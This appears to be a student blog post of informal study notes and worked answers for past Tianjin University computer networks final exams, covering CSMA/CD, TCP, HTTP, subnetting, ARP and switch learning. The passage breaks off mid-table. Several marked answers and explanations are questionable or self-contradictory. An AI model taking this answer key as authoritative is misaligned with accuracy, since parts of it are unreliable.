    <content type="html"><![CDATA[<p>很好，刚想起来后天早八寄网期末考</p><p>以下题目都在 <a href="https://github.com/superpung/TJU-CourseSharing/tree/main/2440130_%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C">TJU-CourseSharing&#x2F;2440130_计算机网络 at main · superpung&#x2F;TJU-CourseSharing · GitHub</a></p><p>学期中有把计网书过了一遍（水过地皮湿（希望吧…</p><p>说着不想复习不想复习，半夜00:16从床上坐起来突然就想复习了，复习到4点把重点全过了一遍 （p人是这样的）</p><p>感谢期中看过的地皮和这学期的网络协议选修（orz</p><p>请先往后翻看2022年的题目，因为题目比较详细，所以先写的那份</p><p>希望对之后复习这部分的学弟学妹们有些帮助，有问题随时提出 飞快地改！</p><h2 id="2019-级考试内容："><a href="#2019-级考试内容：" class="headerlink" title="2019 级考试内容："></a>2019 级考试内容：</h2><p>选择题（每题 2 分）：</p><ol><li>数据包交换</li><li>网络延迟</li><li>P2P 架构</li><li>链路层可靠数据传输</li><li>HTTP</li><li>可靠传输</li><li>TCP</li><li>路由协议</li><li>CSMA&#x2F;CA</li><li>ARP</li></ol><h3 id="CSMA-CD-原理、二进制指数退避算法（5-分）"><a href="#CSMA-CD-原理、二进制指数退避算法（5-分）" class="headerlink" title="CSMA&#x2F;CD 原理、二进制指数退避算法（5 分）"></a>CSMA&#x2F;CD 原理、二进制指数退避算法（5 分）</h3><ol><li>适配器从网络层一条获得数据报，准备链路层帧，并将其放入帧适配器缓存中。</li><li>如果适配器侦听到信道空闲(即无信号能量从信道进入适配器)，它开始传输帧。</li></ol><p>​在另一方面，如果适配器侦听到信道正在忙，它将等待，直到侦听到没有信号能量时才开 始传输帧。</p><ol start="3"><li><p>在传输过程中，适配器监视来自其他使用该广播信道的适配器的信号能量的存在。</p></li><li><p>如果适配器传输整个帧而未检测到来自其他适配器的信号能量，该适配器就完成 了该帧。</p><p>在另一方面，如果适配器在传输时检测到来自其他适配器的信号能量，它中止传输(即它停止了传输帧)。</p></li></ol><ol start="5"><li>中止传输后，适配器等待一个随机时间量，然后返回步骤2。</li></ol><p>选择随机时间量机制叫<strong>二进制指数后退</strong>，即在经历n次碰撞后，从0…&lt;2^n-1中选择一个数</p><p>令d_{prop}为信号能量在任意两个适配器之间传播所需的最大时间，令d_{trans}为传输一个最大长度的以太网帧的时间，我们有CSMA&#x2F;CD的效率公式如下<br>$$<br>\frac 1 {1 + 5d_{prop}&#x2F;d_{trans}}<br>$$</p><h3 id="TCP-报文段-ACK-序列号（4-分）"><a href="#TCP-报文段-ACK-序列号（4-分）" class="headerlink" title="TCP 报文段 ACK 序列号（4 分）"></a>TCP 报文段 ACK 序列号（4 分）</h3><p>?这是在问啥？</p><p>放个TCP连接建立</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217201319328.png" alt="image-20241217201319328"></p><h3 id="Internet-访问外网-Web-协议顺序及功能（15-分）"><a href="#Internet-访问外网-Web-协议顺序及功能（15-分）" class="headerlink" title="Internet 访问外网 Web 协议顺序及功能（15 分）"></a>Internet 访问外网 Web 协议顺序及功能（15 分）</h3><ul><li><a href="https://zrzz.site/posts/e255a10a/#%E5%9B%9E%E9%A1%BEWEB%E7%BD%91%E9%A1%B5%E8%AF%B7%E6%B1%82%E7%9A%84%E8%BF%87%E7%A8%8B">xixi的web网页请求过程解释</a></li></ul><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/1ece8cc69ce1ac3b7a16fe15a9801219_720.jpg" alt="img" style="zoom:67%;" /><h3 id="网络拓扑-Dijkstra-算法填表（12-分）"><a href="#网络拓扑-Dijkstra-算法填表（12-分）" class="headerlink" title="网络拓扑 Dijkstra 算法填表（12 分）"></a>网络拓扑 Dijkstra 算法填表（12 分）</h3><p>后面有</p><h3 id="HTTP-持续-非持续（10-分）"><a href="#HTTP-持续-非持续（10-分）" class="headerlink" title="HTTP 持续&#x2F;非持续（10 分）"></a>HTTP 持续&#x2F;非持续（10 分）</h3><p>发起一个TCP连接时，创建一个套接字，发送请求报文，获取响应报文，关闭TCP，检索响应报文中的HTML文件，发送有10个图片的引用，于是对每个图片重复发起TCP连接的过程，这是一个非持续连接。</p><p>这里我们可以了解到RTT，为往返时间，包括分组传播时延、分组在中间路由器和交换机上的排队时延和分组处理时延。</p><p>如果使用非持续连接，每次请求一个文件至少有两个RTT，对服务器带来眼中的负担。</p><p><strong>持续连接</strong></p><p>如果打开网页后保持一个TCP连接，可以在一个浏览过程中减少近一倍RTT的时间。</p><h3 id="子网划分（12-分）"><a href="#子网划分（12-分）" class="headerlink" title="子网划分（12 分）"></a>子网划分（12 分）</h3><p>非常好的题，拿来！<br><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217214052279.png" alt="image-20241217214052279"></p><h3 id="TCP-Reno-拥塞控制的图象（10-分）"><a href="#TCP-Reno-拥塞控制的图象（10-分）" class="headerlink" title="TCP Reno 拥塞控制的图象（10 分）"></a>TCP Reno 拥塞控制的图象（10 分）</h3><p>好学，自己学。（下面有）</p><h3 id="交换机自学习即插即用与-ARP-即插即用的工作方式和异同（12-分）"><a href="#交换机自学习即插即用与-ARP-即插即用的工作方式和异同（12-分）" class="headerlink" title="交换机自学习即插即用与 ARP 即插即用的工作方式和异同（12 分）"></a>交换机自学习即插即用与 ARP 即插即用的工作方式和异同（12 分）</h3><h4 id="一、交换机自学习即插即用的工作方式"><a href="#一、交换机自学习即插即用的工作方式" class="headerlink" title="一、交换机自学习即插即用的工作方式"></a><strong>一、交换机自学习即插即用的工作方式</strong></h4><p><strong>自学习</strong>是交换机实现即插即用的重要特性，它依赖于<strong>MAC 地址表</strong>，实现局域网（LAN）内的数据转发。</p><ol><li>基本工作过程<ul><li><strong>初始状态</strong>：交换机的 MAC 地址表为空。</li><li><strong>接收帧</strong>：当交换机收到一个数据帧时，会读取帧的 <strong>源 MAC 地址</strong> 和入接口。</li><li><strong>学习</strong>：交换机会将源 MAC 地址和对应的入接口记录到 MAC 地址表中。</li><li>转发帧<ul><li>如果目标 MAC 地址已在表中，交换机将数据帧转发到对应的接口。</li><li>如果目标 MAC 地址不在表中，交换机会将数据帧<strong>泛洪</strong>（Flooding）到所有接口（除接收数据的接口）。</li></ul></li><li><strong>动态更新</strong>：MAC 地址表是动态的，老化时间过后，未更新的条目会被删除。</li></ul></li></ol><p><strong>总结</strong>：交换机通过自学习不断更新 MAC 地址表，从而实现数据的高效转发。</p><hr><h4 id="二、ARP-即插即用的工作方式"><a href="#二、ARP-即插即用的工作方式" class="headerlink" title="二、ARP 即插即用的工作方式"></a><strong>二、ARP 即插即用的工作方式</strong></h4><p><strong>ARP（Address Resolution Protocol）</strong> 是 IP 网络中用于解析 IP 地址到 MAC 地址的协议，帮助设备即插即用地进行通信。</p><ol><li>基本工作过程<ul><li>ARP 请求<ul><li>当主机 A 需要发送数据到某个 IP 地址（例如主机 B）时，A 先检查自己的 ARP 缓存表。</li><li>如果找不到对应的 MAC 地址，A 会发送一个<strong>广播的 ARP 请求</strong>帧，询问 “谁是 IP 地址 X.X.X.X，请告诉我你的 MAC 地址”。</li></ul></li><li>ARP 回复<ul><li>目标主机（如主机 B）接收到 ARP 请求后，会回复一个<strong>单播的 ARP 响应</strong>，告知 A 自己的 MAC 地址。</li></ul></li><li>缓存学习<ul><li>主机 A 收到 ARP 响应后，将 IP 地址与 MAC 地址的对应关系记录到 <strong>ARP 缓存表</strong> 中。</li></ul></li><li>动态更新<ul><li>ARP 缓存表具有<strong>老化机制</strong>，如果一段时间未使用，条目会被删除。</li></ul></li></ul></li></ol><p><strong>总结</strong>：ARP 协议通过地址解析，实现 IP 地址到 MAC 地址的映射，进而支持网络设备即插即用地通信。</p><hr><h4 id="三、交换机自学习与-ARP-即插即用的异同"><a href="#三、交换机自学习与-ARP-即插即用的异同" class="headerlink" title="三、交换机自学习与 ARP 即插即用的异同"></a><strong>三、交换机自学习与 ARP 即插即用的异同</strong></h4><table><thead><tr><th><strong>比较项</strong></th><th><strong>交换机自学习</strong></th><th><strong>ARP 即插即用</strong></th></tr></thead><tbody><tr><td><strong>目的</strong></td><td>维护 MAC 地址表，实现帧的高效转发</td><td>解析 IP 地址到 MAC 地址，实现网络通信</td></tr><tr><td><strong>工作层次</strong></td><td>数据链路层（第二层）</td><td>网络层（第三层）</td></tr><tr><td><strong>触发方式</strong></td><td>数据帧到达交换机</td><td>主机需要解析未知的 IP 地址</td></tr><tr><td><strong>学习内容</strong></td><td>MAC 地址与交换机端口的对应关系</td><td>IP 地址与 MAC 地址的对应关系</td></tr><tr><td><strong>通信方式</strong></td><td>使用交换机的端口学习，进行帧的泛洪</td><td>发送 ARP 广播请求，接收单播响应</td></tr><tr><td><strong>表结构</strong></td><td>MAC 地址表</td><td>ARP 缓存表</td></tr><tr><td><strong>动态更新机制</strong></td><td>自动学习，老化未使用的条目</td><td>自动学习，老化未使用的条目</td></tr></tbody></table><hr><h4 id="四、总结"><a href="#四、总结" class="headerlink" title="四、总结"></a><strong>四、总结</strong></h4><ol><li><strong>相同点</strong>：<ul><li>都具有<strong>即插即用</strong>的特性，自动学习网络地址映射关系。</li><li>都具有<strong>老化机制</strong>，动态删除长时间未使用的条目。</li><li>都是网络设备实现高效通信的重要机制。</li></ul></li><li><strong>不同点</strong>：<ul><li><strong>交换机自学习</strong>工作在数据链路层（L2），维护的是<strong>MAC 地址表</strong>。</li><li><strong>ARP 即插即用</strong>工作在网络层（L3），维护的是<strong>IP 地址与 MAC 地址的映射关系</strong>。</li></ul></li></ol><p>交换机自学习主要用于数据帧转发，而 ARP 协议用于 IP 数据包的地址解析，两者结合可以实现数据链路层和网络层的无缝通信。</p><h2 id="2021级"><a href="#2021级" class="headerlink" title="2021级"></a>2021级</h2><p><a href="https://github.com/superpung/TJU-CourseSharing/blob/main/2440130_%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/%E8%AF%95%E9%A2%98/21_%E8%AE%A1%E7%BD%91.pdf">https://github.com/superpung/TJU-CourseSharing/blob/main/2440130_%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/%E8%AF%95%E9%A2%98/21_%E8%AE%A1%E7%BD%91.pdf</a></p><h3 id="选择"><a href="#选择" class="headerlink" title="选择"></a>选择</h3><p>关于网络应用(network application)和应用层协议(network application-layer protocol)，下列说法正确的是()</p><p>A.应用层协议的性能对网络应用的性能没有影响,<br><strong>B.应用层协议负责数据传输。</strong><br>C.网络应用就是应用层协议，二者没有区别。<br>D.应用层协议的设计包括用户界面的设计。</p><p>关于网络延迟，下列说法正确的是()<br>A.排队延迟(queueing delay)和网络中业务量的变化无关<br>B.传输延迟(transmission delay)和两个节点的物理距离有关。距离越大，传输延迟越大。<br>C.传播延迟(propagation delay)和链路的带宽有关。带宽越大，传播延迟越小。<br><strong>D.节点处理延迟(nodal processing delay) 通常很短，可以忽略不计。</strong></p><blockquote><p>CD反了</p></blockquote><p>关于数据包交换(packet switching)，下列说法正确的是()<br> A.传输过程中没有丢包和乱序,<br>B.发送数据前要建立连接。<br>C.中间节点不需要要存储-转发(store-forward)数据包<br><strong>D.每个数据包独立寻路。</strong></p><p>节点A和B间有条微波无线链路相连。A和B相距100Km，带宽为30 Kbps，数据包长度为1000 bits。需要在A和B间实现可靠数据传输，下列说法正确的是(<br><strong>A. 使用停-等(stop-and-wait)可靠传输协议就能获得很高的链路利用率,</strong><br>B.不需要采用任何可靠传输协议就能实现可靠传输。<br>C.使用FEC(Forward Error Correction)不能改善这条链路的可靠数据传输性能<br>D.只有使用并行的(pipelined)可靠传输协议才能获得较高的链路利用率。</p><blockquote><p>题目解析</p><p>要解答该问题，我们需要考虑链路的基本特性、数据传输协议的性能以及链路利用率的计算。</p><p><strong>背景信息</strong>：</p><ol><li><p><strong>节点 A 和 B 之间的链路参数</strong>：</p><ul><li>距离：d&#x3D;100 Km&#x3D;</li><li>带宽：B&#x3D;30 Kbps&#x3D;</li><li>数据包长度：L&#x3D;1000 bits&#x3D;</li></ul></li><li><p><strong>传播时延</strong>（Propagation Delay）： 假设信号传播速率 v≈2×10^8 m&#x2F;s（光速在空气中）。<br>$$<br>\text{传播时延} &#x3D; \frac{\text{距离}}{\text{信号传播速率}} &#x3D; \frac{100 \times 10^3}{2 \times 10^8} &#x3D; 0.5 , \text{ms}<br>$$</p></li><li><p><strong>传输时延</strong>（Transmission Delay）： 传输时延是发送数据所需的时间，计算公式为：<br>$$<br>\text{传输时延} &#x3D; \frac{\text{数据包长度}}{\text{链路带宽}} &#x3D; \frac{1000 , \text{bits}}{30 \times 10^3 , \text{bits&#x2F;s}} &#x3D; 0.0333 , \text{s} &#x3D; 33.3 , \text{ms}<br>$$</p></li></ol><p><strong>A. 使用停-等（Stop-and-Wait）协议就能获得很高的链路利用率</strong></p><p>*停-等协议的特点**：发送方发送一个数据包后，必须等待接收方确认（ACK）才能发送下一个数据包。</p><p><strong>链路利用率</strong>的计算公式为：</p><p>链路利用率&#x3D;传输时延传输时延+2×传播时延\text{链路利用率} &#x3D; \frac{\text{传输时延}}{\text{传输时延} + 2 \times \text{传播时延}}</p><p>代入数值：</p><ul><li>传输时延：33.3 ms</li><li>传播时延：0.5 ms</li></ul><p>$$<br>\text{链路利用率} &#x3D; \frac{33.3}{33.3 + 2 \times 0.5} &#x3D; \frac{33.3}{34.3} \approx 97%<br>$$</p><p><strong>分析</strong>：虽然停-等协议在短距离高带宽链路中利用率较低，但在此链路中，传输时延远大于传播时延，因此利用率较高。</p><p><strong>选项 A 是正确的。</strong></p><p><strong>B. 不需要采用任何可靠传输协议就能实现可靠传输</strong></p><ul><li><p>无线链路通常存在干扰、误码率高等问题，数据传输可能会出现丢包或错误。</p></li><li><p>因此，为了实现可靠传输，必须采用某种可靠传输协议（如停-等协议、滑动窗口协议等）。</p><p><strong>选项 B 是错误的。</strong></p></li></ul><p><strong>C. 使用 FEC（前向纠错）不能改善这条链路的可靠数据传输性能</strong></p><p>FEC（Forward Error Correction）是一种在传输时加入冗余信息的技术，可以在接收方检测并纠正部分错误，减少重传需求。</p><p>在无线链路中，FEC 可以有效减少传输错误，从而提高可靠传输的性能。</p><p><strong>选项 C 是错误的。</strong></p><p>D. 只有使用并行的（Pipelined）可靠传输协议才能获得较高的链路利用率**</p><p><strong>并行可靠传输协议</strong>（如滑动窗口协议）可以在等待 ACK 的同时继续发送多个数据包，从而提高链路利用率。</p><p>然而，在本链路中，由于停-等协议已经可以实现较高的利用率（97%），不一定需要并行协议才能达到高利用率。</p><p><strong>选项 D 是错误的。</strong></p></blockquote><p>关于HTTP，下列说法正确的是()<br>A. HTTP 的数据包头部是以二进制形式存储的，很难读懂内容。<br>B.使用UDP协议。<br><strong>C.HTTP 服务器采用无状态(stateless)管理方式，不保存客户端的任何状态信息。为了能记录用户状态，需要使用cookies。</strong><br>D. HTTP的web proxy 总是能够降低响应时间，提升用户体验。</p><p>关于可靠数据传输，下列说法正确的是()<br>A. SR协议中，发送端窗口通常和接收端窗口大小相等，并且大于等于数据包最大序列号的一半.。</p><blockquote><p>在 <strong>SR（Selective Repeat）协议</strong> 中，发送方和接收方窗口的大小是有限的，但通常满足以下条件：</p><p>窗口大小≤序列号空间大小2<br>$$<br>\text{窗口大小} \leq \frac{\text{序列号空间大小}}{2}<br>$$</p><ul><li>这里的序列号空间是数据包序列号的最大值加 1。</li><li>这是为了避免<strong>序列号混淆</strong>，因为 SR 协议允许接收方接收和缓存不按顺序到达的数据包。</li></ul><p>因此，发送窗口和接收窗口的大小不一定 <strong>相等</strong>，且必须小于数据包最大序列号的一半。</p></blockquote><p><strong>B.SR(Selective Repeat)和GBN都采用滑动窗口(sliding window)机制实现对发送端&#x2F;接收端缓冲区的管理。</strong></p><blockquote><p><strong>SR 和 GBN 协议</strong> 都属于滑动窗口协议。</p><ul><li>GBN（Go-Back-N）<ul><li>发送方维护一个连续的滑动窗口。</li><li>接收方只接收按顺序到达的数据包，丢弃失序的数据包。</li></ul></li><li>SR（Selective Repeat）<ul><li>发送方和接收方都维护滑动窗口。</li><li>接收方可以接受不按顺序到达的数据包，并缓存起来。</li></ul></li></ul></blockquote><p>C.停-等(stop-and-wait)协议的链路利用率一定低于GBN(Go-Back-N)。</p><blockquote><p>链路利用率计算公式：</p></blockquote><p>$$<br>\text{利用率} &#x3D; \frac{\text{传输时延}}{\text{传输时延} + 2 \times \text{传播时延}}<br>$$</p><p>D.在停-等协议中，数据包(data)丢失引发的超时重传会导致接收端收到重复的数据包,</p><p>下列哪些协议层是在操作系统的用户空间实现的?<br> <strong>A. 应用层</strong><br>B.传输层<br>C.网络层<br>D. 物理层<br>E.数据链路层!</p><p>关于网络层,下列说法正确的是()<br>A.路由器(router)和交换机(switch)都是网络层的互联设备。<br><strong>B.网络层的数据平面(data plane)负责转发(forwarding)，控制平面(control plane)负责路由(routing)。</strong><br>C.IP协议维护转发表(forwarding table)。<br>D.不同物理介质(physica media)的网络如果要互联(internetworking),那么在网络层也可以使用不同的IP协议。</p><p>关于路由算法,下列说法正确的是()<br>A.路由算法负责为数据包从源节点到目的节点找到一条性能好的路径。因此必须知道全局的网络拓扑结构。<br>B.跳数(the number of hops)不能做为路由算法的性能评价参数。<br><strong>C.路由算法的性能评价参数必须根据设计需求来确定。</strong><br>D.路由算法的性能对网络性能影响不大!</p><p>关于TCP的流量控制(flow control)，下列说法正确的是()<br>A.不能减少丢包的发生,<br>B.和网络传输速率有关。<br>C.不能改变发送端的发送速率。<br><strong>D.为了解决TCP两端发送速率和接收速率不匹配的问题</strong></p><h3 id="大题"><a href="#大题" class="headerlink" title="大题"></a>大题</h3><p><strong><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217221755496.png" alt="image-20241217221755496"></strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217221850661.png" alt="image-20241217221850661"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217221920946.png" alt="image-20241217221920946"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217221937079.png" alt="image-20241217221937079"></p><h2 id="2022级"><a href="#2022级" class="headerlink" title="2022级"></a>2022级</h2><p><a href="https://github.com/superpung/TJU-CourseSharing/blob/main/2440130_%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/%E8%AF%95%E9%A2%98/22_%E8%AE%A1%E7%BD%91.pdf">https://github.com/superpung/TJU-CourseSharing/blob/main/2440130_%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/%E8%AF%95%E9%A2%98/22_%E8%AE%A1%E7%BD%91.pdf</a></p><h3 id="选择题"><a href="#选择题" class="headerlink" title="选择题"></a>选择题</h3><ol><li><p>主机A和主机B之间建立了TCP连接，A向B发送了一个报文段，其中Seq&#x3D;199，ack&#x3D;200，数据部分有两个字节，则主机B对该报文的确认报文段中：</p><p>A. Seq &#x3D; 201,  ack &#x3D; 200   B. Seq &#x3D; 201,  ack &#x3D; 201   <strong>C. Seq &#x3D; 200,  ack &#x3D; 201</strong>   D. Seq &#x3D; 202,  ack &#x3D; 201</p></li></ol><blockquote><p>Seq(序列号)——表示发送的报文段中数据部分的第一个字节再A的发送缓存区中的编号</p><p>Ack(确认号)——表示A期望收到的下一个报文段的数据部分的第一个字节在B的发送缓存区中的编号。</p><p>发送两个字节，B发送Seq &#x3D; A之前的ack 200； B即接收到数据后B准备发送的下一个字节序列号，Ack &#x3D; 199+2字节&#x3D;201 </p></blockquote><ol start="2"><li><p>下列关于TCP和UTP的说法，错误的是：</p><p>A. TCP是面向连接的服务，在数据传输前要进行 三次握手</p><p>B. UDP提供一种不可靠数据传送服务，是无连接的。</p><p><strong>C. UDP报文段中的确认号，用于接收方跟发送放确认报文接收</strong></p><p>D. TCP拥塞控制主要包括慢启动、拥塞避免、快速回复等技术</p></li></ol><blockquote><p>基础知识。</p><p>下列关于TCP和UDP的说法，错误的是：</p><p><strong>A. TCP是面向连接的服务，在数据传输前要进行三次握手</strong><br> 这是正确的。TCP（传输控制协议）是面向连接的协议，在数据传输前，双方需要通过三次握手（3-way handshake）来建立连接。</p><p><strong>B. UDP提供一种不可靠数据传送服务，是无连接的</strong><br> 这是正确的。UDP（用户数据报协议）是无连接的协议，不进行连接的建立，且不保证数据的可靠性。</p><p><strong>C. UDP报文段中的确认号，用于接收方跟发送方确认报文接收</strong><br> 这是错误的。UDP不使用确认号。UDP是无连接的，不会像TCP那样进行数据的确认和重传，因此其报文段中没有确认号字段。确认号是TCP协议中的概念，用于接收方告诉发送方其已收到的数据的字节序列号。</p><p><strong>D. TCP拥塞控制主要包括慢启动、拥塞避免、快速恢复等技术</strong><br> 这是正确的。TCP协议在数据传输过程中会进行拥塞控制，主要包括慢启动、拥塞避免、快速重传、快速恢复等算法来控制网络的拥塞情况，避免网络的过载。</p></blockquote><ol start="3"><li><p>考虑通过固定的路由从源主机发送数据包到目标主机，下面那个延迟可能会发生变化</p><p>A. 节点处理延迟 B.传输延迟 C.传播延迟 <strong>D.排队延迟</strong></p></li></ol><blockquote><p><strong>节点处理延迟 (Node Processing Delay)</strong><br>节点处理延迟是指数据包在经过每个路由器或主机时的处理时间，包括检查数据包头部、转发数据包等。由于节点处理延迟依赖于设备的处理能力，一般情况下，如果路由器和主机配置固定，且处理能力不变，节点处理延迟是固定的。</p><p><strong>传输延迟 (Transmission Delay)</strong><br>传输延迟是指数据包在传输媒介上传输所需的时间。它由数据包的大小和链路的传输速率决定。由于题目假设是固定路由，因此链路的带宽和数据包的大小也都是固定的，因此传输延迟也是固定的。</p><p><strong>传播延迟 (Propagation Delay)</strong><br>传播延迟是指信号在传输介质中传播的时间，通常取决于信号传播的距离和介质的传播速度。如果路由是固定的，且链路的物理属性没有变化，那么传播延迟也是固定的。</p><p><strong>排队延迟 (Queuing Delay)</strong><br>排队延迟是指数据包在路由器或交换机队列中等待转发的时间。排队延迟受网络流量、路由器负载以及队列管理策略等因素的影响。由于网络负载和流量变化，数据包在排队等待时所经历的延迟可能会发生变化。因此，排队延迟是最可能变化的延迟。</p></blockquote><ol start="4"><li><p>给定子网200.168.240&#x2F;24，则该子网能支持的同时上网的用户数量和子网掩码是多少？</p><p>​<strong>B. 254; 255.255.255.0</strong></p></li></ol><blockquote><p>24—&gt;255.255.255.0； 子网内剩余8个位置，2^8-2（排除网络地址和广播地址）实际254个</p></blockquote><ol start="5"><li><p>Persistent HTTP 与 Non-persistent HTTP区别在于</p><p>A. Persistent HTTP 不需要建立传输层的TCP连接</p><p>B. Persistent HTTP 在应用层与传输层之间采用Socket通信</p><p><strong>C. Persistent HTTP 可以通过一个TCP链接获取多个对象（Objects）</strong></p><p>D. Persistent HTTP 在两个RTT时间内只能传输一个对象（Object）</p><blockquote><p>Persistent HTTP 允许在一个连接中传输多个对象，而不是限制在两个往返时间（RTT）内只能传输一个对象。事实上，Persistent HTTP 旨在减少连接建立的延迟（包括RTT），通过复用连接来提高效率。</p></blockquote></li><li><p>关于P2P和C&#x2F;S 网络应用架构，下列说法正确的是</p><p>A. P2P应用系统中的节点只能是客户端或者是服务器</p><p>B. P2P应用架构需要在TCP&#x2F;IP协议增加功能来进行支持</p><p><strong>C. 在P2P架构下，每个Peer既可以提供服务又可以请求服务</strong></p><p>D. P2P架构总比C&#x2F;S架构性能优越</p></li></ol><blockquote><p><strong>A. P2P应用系统中的节点只能是客户端或者是服务器</strong><br>这个说法是错误的。在 P2P（Peer-to-Peer）架构中，节点既可以充当客户端，也可以充当服务器，或者两者兼具。P2P架构的核心特点是每个节点（Peer）都可以同时提供服务和请求服务。因此，并不限制节点只能是客户端或服务器。</p><p><strong>B. P2P应用架构需要在TCP&#x2F;IP协议增加功能来进行支持</strong><br>这个说法也是错误的。P2P架构并不需要对TCP&#x2F;IP协议做任何额外的修改或扩展。<strong>P2P应用可以在现有的TCP&#x2F;IP协议栈之上实现</strong>，所有的通信都可以使用标准的TCP&#x2F;IP协议进行，P2P的主要特点是节点之间的直接通信和资源共享。</p><p><strong>C. 在P2P架构下，每个Peer既可以提供服务又可以请求服务</strong><br>这是正确的。<strong>P2P架构的一个重要特点就是每个节点既可以作为服务提供者，又可以作为服务请求者。</strong>每个Peer（节点）既可以向其他节点提供资源或服务，又可以从其他节点请求服务或资源。因此，P2P架构的灵活性非常高。</p><p><strong>D. P2P架构总比C&#x2F;S架构性能优越</strong><br>这个说法是错误的。P2P架构的性能不一定总是优于C&#x2F;S（Client&#x2F;Server）架构。C&#x2F;S架构通常有明确的服务器角色，服务器负责处理大部分的请求和负载，适合高性能、高可靠性需求的应用。而P2P架构虽然可以通过分散的节点来分担负载，但在某些情况下（例如需要高效管理大量用户或资源时），P2P架构可能并不如C&#x2F;S架构高效。因此，P2P架构的性能优劣取决于具体的应用场景。</p></blockquote><ol start="9"><li><p>下列关于CSMA&#x2F;CA协议的说法错误的是</p><blockquote><p>（Carrier Sense Multiple Access with Collision Avoidance，载波监听多路访问&#x2F;冲突避免协议）</p></blockquote><p><strong>A. 在数据帧发送过程中能够检测到信道冲突（collision）</strong></p><blockquote><p>在 <strong>CSMA&#x2F;CA</strong> 协议中，冲突是在发送数据之前通过“避免”而不是“检测”来处理的。具体来说，<strong>CSMA&#x2F;CA</strong> 主要采用冲突避免机制，而不是像 <strong>CSMA&#x2F;CD</strong>（Carrier Sense Multiple Access with <strong>Collision Detection</strong>，载波监听多路访问&#x2F;冲突检测协议）那样在数据传输过程中检测冲突。在 CSMA&#x2F;CA 中，节点通过监听信道并等待随机时间来避免冲突，而不是在数据帧发送过程中检测冲突。</p></blockquote><p>B. 在发送数据帧前先监听信道状态</p><p>C. 检测到信道忙时，随即等待一段时间再继续监测信道</p><p>D.使用Stop-and-Wait可靠传输来应对信道冲突产生的丢包</p></li><li><p>下列说法中错误的是：</p><p>A. IP层可以频闭各个物理网络的差异</p><blockquote><p>IP层通过统一的协议（如IPv4或IPv6）为上层提供一致的通信接口，使得不同物理层之间的差异对应用层透明。</p></blockquote><p><strong>B. IP层可以代替各个物理网络和数据链路层工作</strong></p><blockquote><p>IP层并不能代替物理网络和数据链路层的工作。IP层位于 OSI 模型的第三层，而物理层和数据链路层分别位于第一层和第二层。IP层负责路由和转发数据包，而物理和数据链路层负责在物理介质上传输数据帧，进行错误检测和流量控制等。</p></blockquote><p>C. IP层可以隐藏各个物理为网络的实现细节</p><p>D. IP层可以提供转发和路由的功能</p></li></ol><h3 id="简答题"><a href="#简答题" class="headerlink" title="简答题"></a>简答题</h3><h4 id="以下图网络拓扑为例，主机A向主机B发送数据。从网络层和链路层来简要描述数据发送的过程，并且说明在此过程中数据包头部的源和目的的MAC地址（12分）"><a href="#以下图网络拓扑为例，主机A向主机B发送数据。从网络层和链路层来简要描述数据发送的过程，并且说明在此过程中数据包头部的源和目的的MAC地址（12分）" class="headerlink" title="以下图网络拓扑为例，主机A向主机B发送数据。从网络层和链路层来简要描述数据发送的过程，并且说明在此过程中数据包头部的源和目的的MAC地址（12分）"></a>以下图网络拓扑为例，主机A向主机B发送数据。从网络层和链路层来简要描述数据发送的过程，并且说明在此过程中数据包头部的源和目的的MAC地址（12分）</h4><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217145309066.png" alt="image-20241217145309066"></p><h5 id="网络层：（IP地址）"><a href="#网络层：（IP地址）" class="headerlink" title="网络层：（IP地址）"></a>网络层：（IP地址）</h5><ul><li>主机A（源IP：111.111.111.111）将数据发送到主机B(222.222.222.222)</li><li>路由器是IP数据包转发的关键设备，通过IP地址来决定数据包转发路径</li></ul><h5 id="链路层（MAC地址）"><a href="#链路层（MAC地址）" class="headerlink" title="链路层（MAC地址）"></a>链路层（MAC地址）</h5><ol><li><strong>主机A到路由器：</strong><ul><li>主机A (MAC: <code>74-29-9C-E8-FF-55</code>) 将数据发送到路由器的接口 (MAC: <code>E6-E9-00-77-BB-4B</code>)。</li><li>数据帧头部的MAC地址：<ul><li><strong>源MAC地址</strong>：<code>74-29-9C-E8-FF-55</code></li><li><strong>目的MAC地址</strong>：<code>E6-E9-00-77-BB-4B</code></li></ul></li></ul></li><li><strong>路由器处理数据包：MAC会变IP不变</strong><ul><li>路由器接收到数据帧后，解封装数据包，分析IP地址发现目标地址 (<code>222.222.222.222</code>) 在其下一跳网络。</li><li>路由器将数据包重新封装成新的数据帧，准备发送给下一跳的主机B或其局域网中的设备。</li><li>路由器接口 (MAC: <code>E6-E9-00-77-BB-4B</code>) 通过链路将数据发送给主机B所在网络的设备。</li></ul></li><li><strong>路由器到主机B：</strong><ul><li>路由器 (MAC: <code>1A-23-F9-CD-06-9B</code>) 将数据发送到主机B (MAC: <code>49-BD-D2-C7-56-2A</code>)。</li><li>数据帧头部的MAC地址：<ul><li><strong>源MAC地址</strong>：<code>1A-23-F9-CD-06-9B</code></li><li><strong>目的MAC地址</strong>：<code>49-BD-D2-C7-56-2A</code></li></ul></li></ul></li></ol><h5 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h5><p>数据发送过程中，源和目的MAC地址在不同链路上传输时会发生变化，但IP地址始终保持不变：</p><table><thead><tr><th><strong>阶段</strong></th><th><strong>源MAC地址</strong></th><th><strong>目的MAC地址</strong></th><th><strong>源IP地址</strong></th><th><strong>目的IP地址</strong></th></tr></thead><tbody><tr><td>主机A -&gt; 路由器</td><td><code>74-29-9C-E8-FF-55</code></td><td><code>E6-E9-00-77-BB-4B</code></td><td><code>111.111.111.111</code></td><td><code>222.222.222.222</code></td></tr><tr><td>路由器 -&gt; 